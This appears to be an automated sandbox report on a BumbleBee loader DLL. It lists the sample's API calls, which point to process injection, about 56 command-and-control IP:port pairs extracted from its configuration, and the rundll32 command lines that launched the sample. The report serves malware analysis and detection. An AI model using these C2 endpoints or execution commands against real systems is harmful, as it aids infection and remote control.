              Source: Binary string: kernelbase.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: kernel32.pdb0 source: WerFault.exe, 00000017.00000003.513682177.000001CE20710000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.511592812.000001CE20710000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.514620485.00000186861B0000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.516093975.00000186861B0000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.515614989.000001F5F3540000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.512632464.000001F5F3540000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: imm32.pdb source: WerFault.exe, 00000017.00000003.522242157.000001CE21210000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522247900.0000018686D80000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524143635.000001F5F3FB0000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535F9C34 ExitProcess,GetLastError,FindFirstFileA,ConnectNamedPipe,CreateFileA,2_2_00007FFA535F9C34
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535F9404 FindFirstFileA,CreateNamedPipeA,2_2_00007FFA535F9404
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535EE00C FindFirstFileExA,2_2_00007FFA535EE00C
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_0000021520614570 FindFirstFileExA,14_2_0000021520614570
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535F9C34 ExitProcess,GetLastError,FindFirstFileA,ConnectNamedPipe,CreateFileA,14_2_00007FFA535F9C34
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535F9404 FindFirstFileA,CreateNamedPipeA,14_2_00007FFA535F9404
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535EE00C FindFirstFileExA,14_2_00007FFA535EE00C
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80E4570 FindFirstFileExA,19_2_00000285C80E4570

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 146.19.173.184:443
              Source: Malware configuration extractorURLs: 41.15.71.157:274
              Source: Malware configuration extractorURLs: 66.9.9.138:154
              Source: Malware configuration extractorURLs: 36.201.196.202:367
              Source: Malware configuration extractorURLs: 173.200.61.240:100
              Source: Malware configuration extractorURLs: 116.241.116.41:410
              Source: Malware configuration extractorURLs: 242.232.106.206:162
              Source: Malware configuration extractorURLs: 10.195.46.61:489
              Source: Malware configuration extractorURLs: 249.112.226.98:243
              Source: Malware configuration extractorURLs: 130.242.219.205:423
              Source: Malware configuration extractorURLs: 154.56.0.113:443
              Source: Malware configuration extractorURLs: 179.5.59.188:228
              Source: Malware configuration extractorURLs: 217.246.42.10:346
              Source: Malware configuration extractorURLs: 169.197.227.201:474
              Source: Malware configuration extractorURLs: 231.228.102.246:186
              Source: Malware configuration extractorURLs: 185.165.82.120:182
              Source: Malware configuration extractorURLs: 74.230.15.244:376
              Source: Malware configuration extractorURLs: 94.88.121.46:403
              Source: Malware configuration extractorURLs: 120.181.249.142:177
              Source: Malware configuration extractorURLs: 138.141.158.45:217
              Source: Malware configuration extractorURLs: 128.79.29.175:298
              Source: Malware configuration extractorURLs: 104.168.200.192:443
              Source: Malware configuration extractorURLs: 196.168.84.24:372
              Source: Malware configuration extractorURLs: 143.27.231.233:335
              Source: Malware configuration extractorURLs: 133.99.126.202:263
              Source: Malware configuration extractorURLs: 222.202.140.206:438
              Source: Malware configuration extractorURLs: 117.172.191.115:471
              Source: Malware configuration extractorURLs: 158.208.5.127:269
              Source: Malware configuration extractorURLs: 218.155.13.204:130
              Source: Malware configuration extractorURLs: 219.110.187.248:435
              Source: Malware configuration extractorURLs: 209.244.102.105:112
              Source: Malware configuration extractorURLs: 23.19.58.212:443
              Source: Malware configuration extractorURLs: 4.177.13.86:289
              Source: Malware configuration extractorURLs: 204.223.28.129:424
              Source: Malware configuration extractorURLs: 246.134.183.74:364
              Source: Malware configuration extractorURLs: 165.132.190.127:368
              Source: Malware configuration extractorURLs: 89.159.155.176:455
              Source: Malware configuration extractorURLs: 185.69.113.39:124
              Source: Malware configuration extractorURLs: 47.26.53.19:195
              Source: Malware configuration extractorURLs: 41.70.42.112:452
              Source: Malware configuration extractorURLs: 74.219.241.225:481
              Source: Malware configuration extractorURLs: 66.15.189.146:122
              Source: Malware configuration extractorURLs: 28.23.200.103:366
              Source: Malware configuration extractorURLs: 159.248.192.111:424
              Source: Malware configuration extractorURLs: 170.88.0.154:120
              Source: Malware configuration extractorURLs: 79.196.23.192:106
              Source: Malware configuration extractorURLs: 146.70.106.76:443
              Source: Malware configuration extractorURLs: 249.57.205.117:166
              Source: Malware configuration extractorURLs: 62.82.188.190:234
              Source: Malware configuration extractorURLs: 221.131.148.148:357
              Source: Malware configuration extractorURLs: 206.245.228.10:133
              Source: Malware configuration extractorURLs: 51.68.146.186:443
              Source: Malware configuration extractorURLs: 118.89.112.82:338
              Source: Malware configuration extractorURLs: 116.205.234.96:247
              Source: Malware configuration extractorURLs: 205.160.222.15:274
              Source: Malware configuration extractorURLs: 191.190.49.225:191
              Source: WerFault.exe, 00000017.00000002.542446366.000001CE20700000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000002.540940699.00000186861A0000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000002.541307623.000001F5F3530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_0000021520592270 WSARecv,WSAGetLastError,14_2_0000021520592270

              E-Banking Fraud

              barindex
              Yara detected BumbleBee
              Source: Yara matchFile source: 19.2.rundll32.exe.285c8050000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.rundll32.exe.21520580000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.rundll32.exe.285c8050000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.rundll32.exe.21520580000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6560 -s 316
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535F9C342_2_00007FFA535F9C34
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535F94042_2_00007FFA535F9404
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535F8C002_2_00007FFA535F8C00
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535E14882_2_00007FFA535E1488
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535F68982_2_00007FFA535F6898
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535EB2BC2_2_00007FFA535EB2BC
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535F1B402_2_00007FFA535F1B40
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535EDE002_2_00007FFA535EDE00
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535F59E82_2_00007FFA535F59E8
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535E79EC2_2_00007FFA535E79EC
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535E9EA02_2_00007FFA535E9EA0
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535F6E942_2_00007FFA535F6E94
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535F7A402_2_00007FFA535F7A40
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535FAA402_2_00007FFA535FAA40
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535F84F02_2_00007FFA535F84F0
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535E59AC2_2_00007FFA535E59AC
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535F615C2_2_00007FFA535F615C
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535EBD482_2_00007FFA535EBD48
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205D041014_2_00000215205D0410
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_0000021520589E0014_2_0000021520589E00
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_0000021520583FD014_2_0000021520583FD0
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205E3FC414_2_00000215205E3FC4
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205E004014_2_00000215205E0040
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205940F014_2_00000215205940F0
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_000002152060215414_2_0000021520602154
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205EA18C14_2_00000215205EA18C
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205CC18014_2_00000215205CC180
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_000002152059227014_2_0000021520592270
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_000002152058620014_2_0000021520586200
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_000002152060835C14_2_000002152060835C
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_000002152061436414_2_0000021520614364
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205DE33014_2_00000215205DE330
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205E053814_2_00000215205E0538
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205F259014_2_00000215205F2590
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205E07A014_2_00000215205E07A0
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205E296C14_2_00000215205E296C
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205FCA5C14_2_00000215205FCA5C
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205D4AA414_2_00000215205D4AA4
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_0000021520612B4014_2_0000021520612B40
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205F0B2814_2_00000215205F0B28
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205FCCD814_2_00000215205FCCD8
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205DECD814_2_00000215205DECD8
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_0000021520604C7814_2_0000021520604C78
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205E4D8C14_2_00000215205E4D8C
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205C2DB014_2_00000215205C2DB0
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205E2E2814_2_00000215205E2E28
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_000002152060EE7814_2_000002152060EE78
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205DAF5414_2_00000215205DAF54
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205A2F4014_2_00000215205A2F40
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205FCF5414_2_00000215205FCF54
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_0000021520604FB614_2_0000021520604FB6
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205DCFD814_2_00000215205DCFD8
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215206110A414_2_00000215206110A4
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205C72F014_2_00000215205C72F0
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205E32E414_2_00000215205E32E4
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215206152A014_2_00000215206152A0
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215206012B014_2_00000215206012B0
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205F131414_2_00000215205F1314
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_000002152058D3F014_2_000002152058D3F0
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205E13DC14_2_00000215205E13DC
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205C73A014_2_00000215205C73A0
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_000002152060944C14_2_000002152060944C
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205FF43414_2_00000215205FF434
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205DB4C014_2_00000215205DB4C0
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205C549014_2_00000215205C5490
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205CB51014_2_00000215205CB510
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_000002152060758C14_2_000002152060758C
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205D768414_2_00000215205D7684
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205E579014_2_00000215205E5790
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_000002152058378014_2_0000021520583780
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_000002152060179014_2_0000021520601790
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_000002152060B8AC14_2_000002152060B8AC
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_000002152058393014_2_0000021520583930
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205E99F414_2_00000215205E99F4
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205DD98414_2_00000215205DD984
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215206099B414_2_00000215206099B4
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205EFA8814_2_00000215205EFA88
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205DFB4814_2_00000215205DFB48
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_0000021520613B4014_2_0000021520613B40
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_0000021520609B5414_2_0000021520609B54
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_0000021520609CF414_2_0000021520609CF4
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205EFCE814_2_00000215205EFCE8
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_0000021520607D6414_2_0000021520607D64
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205C3D6014_2_00000215205C3D60
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_0000021520613DE814_2_0000021520613DE8
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_0000021520587ED014_2_0000021520587ED0
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_0000021520601EDC14_2_0000021520601EDC
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_0000021520607EC814_2_0000021520607EC8
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_0000021520583EB014_2_0000021520583EB0
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535E148814_2_00007FFA535E1488
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535F9C3414_2_00007FFA535F9C34
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535F7A4014_2_00007FFA535F7A40
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535F615C14_2_00007FFA535F615C
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535F689814_2_00007FFA535F6898
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535F84F014_2_00007FFA535F84F0
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535F940414_2_00007FFA535F9404
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535EB2BC14_2_00007FFA535EB2BC
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535F1B4014_2_00007FFA535F1B40
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535F59E814_2_00007FFA535F59E8
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535E79EC14_2_00007FFA535E79EC
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535E59AC14_2_00007FFA535E59AC
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535EDE0014_2_00007FFA535EDE00
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535E9EA014_2_00007FFA535E9EA0
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535EBD4814_2_00007FFA535EBD48
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535F8C0014_2_00007FFA535F8C00
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535FAA4014_2_00007FFA535FAA40
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535F6E9414_2_00007FFA535F6E94
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C8059E0019_2_00000285C8059E00
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80A041019_2_00000285C80A0410
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80B99F419_2_00000285C80B99F4
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80BFA8819_2_00000285C80BFA88
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80E3B4019_2_00000285C80E3B40
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80D9B5419_2_00000285C80D9B54
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80AFB4819_2_00000285C80AFB48
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80D9CF419_2_00000285C80D9CF4
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80BFCE819_2_00000285C80BFCE8
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C8093D6019_2_00000285C8093D60
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80D7D6419_2_00000285C80D7D64
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80E3DE819_2_00000285C80E3DE8
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C8053EB019_2_00000285C8053EB0
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C8057ED019_2_00000285C8057ED0
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80D7EC819_2_00000285C80D7EC8
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80D1EDC19_2_00000285C80D1EDC
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80B3FC419_2_00000285C80B3FC4
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C8053FD019_2_00000285C8053FD0
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80B004019_2_00000285C80B0040
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80640F019_2_00000285C80640F0
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80D215419_2_00000285C80D2154
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C809C18019_2_00000285C809C180
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80BA18C19_2_00000285C80BA18C
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80E52A019_2_00000285C80E52A0
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80D12B019_2_00000285C80D12B0
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80B32E419_2_00000285C80B32E4
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80972F019_2_00000285C80972F0
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80C131419_2_00000285C80C1314
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80973A019_2_00000285C80973A0
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80B13DC19_2_00000285C80B13DC
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C805D3F019_2_00000285C805D3F0
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80CF43419_2_00000285C80CF434
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80D944C19_2_00000285C80D944C
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C809549019_2_00000285C8095490
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80AB4C019_2_00000285C80AB4C0
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C809B51019_2_00000285C809B510
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80D758C19_2_00000285C80D758C
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80A768419_2_00000285C80A7684
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C805378019_2_00000285C8053780
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80B579019_2_00000285C80B5790
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80D179019_2_00000285C80D1790
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80DB8AC19_2_00000285C80DB8AC
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C805393019_2_00000285C8053930
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80AD98419_2_00000285C80AD984
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80D99B419_2_00000285C80D99B4
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80CCA5C19_2_00000285C80CCA5C
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80A4AA419_2_00000285C80A4AA4
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80C0B2819_2_00000285C80C0B28
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80E2B4019_2_00000285C80E2B40
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80D4C7819_2_00000285C80D4C78
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80AECD819_2_00000285C80AECD8
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80CCCD819_2_00000285C80CCCD8
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80B4D8C19_2_00000285C80B4D8C
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C8092DB019_2_00000285C8092DB0
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80B2E2819_2_00000285C80B2E28
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80DEE7819_2_00000285C80DEE78
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C8072F4019_2_00000285C8072F40
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80CCF5419_2_00000285C80CCF54
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80AAF5419_2_00000285C80AAF54
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80D4FB619_2_00000285C80D4FB6
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80ACFD819_2_00000285C80ACFD8
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80E10A419_2_00000285C80E10A4
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C805620019_2_00000285C8056200
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C806227019_2_00000285C8062270
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80AE33019_2_00000285C80AE330
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80E436419_2_00000285C80E4364
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80D835C19_2_00000285C80D835C
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80B053819_2_00000285C80B0538
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80C259019_2_00000285C80C2590
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80B07A019_2_00000285C80B07A0
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80B296C19_2_00000285C80B296C
              Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000021520627098 appears 77 times
              Source: C:\Windows\System32\rundll32.exeCode function: String function: 00000215205D0900 appears 45 times
              Source: C:\Windows\System32\rundll32.exeCode function: String function: 00000285C80A0900 appears 45 times
              Source: C:\Windows\System32\rundll32.exeCode function: String function: 00000285C80F7098 appears 77 times
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_000002152058C180 VirtualAlloc,GetModuleHandleW,GetProcAddress,GetProcAddress,GetCurrentProcess,NtCreateThreadEx,GetThreadContext,SetThreadContext,ResumeThread,14_2_000002152058C180
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535FB25C GetCurrentThreadId,NtOpenFile,14_2_00007FFA535FB25C
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535F5694 NtMapViewOfSection,14_2_00007FFA535F5694
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535FB5B0 GetCurrentThreadId,NtCreateSection,14_2_00007FFA535FB5B0
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535F615C NtCreateSection,DisconnectNamedPipe,14_2_00007FFA535F615C
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C805C180 VirtualAlloc,GetModuleHandleW,GetProcAddress,GetProcAddress,GetCurrentProcess,NtCreateThreadEx,GetThreadContext,SetThreadContext,ResumeThread,19_2_00000285C805C180
              Source: o7m2se.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\o7m2se.dll"
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",#1
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\o7m2se.dll,KInMQF
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",#1
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6560 -s 316
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6572 -s 324
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\o7m2se.dll,KwNqBn2l9N
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6796 -s 316
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\o7m2se.dll,LLBMPMUsqf
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",KInMQF
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",KwNqBn2l9N
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",LLBMPMUsqf
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",SrNF6Da
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7064 -s 316
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7072 -s 316
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7140 -s 316
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7072 -s 316
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7140 -s 316
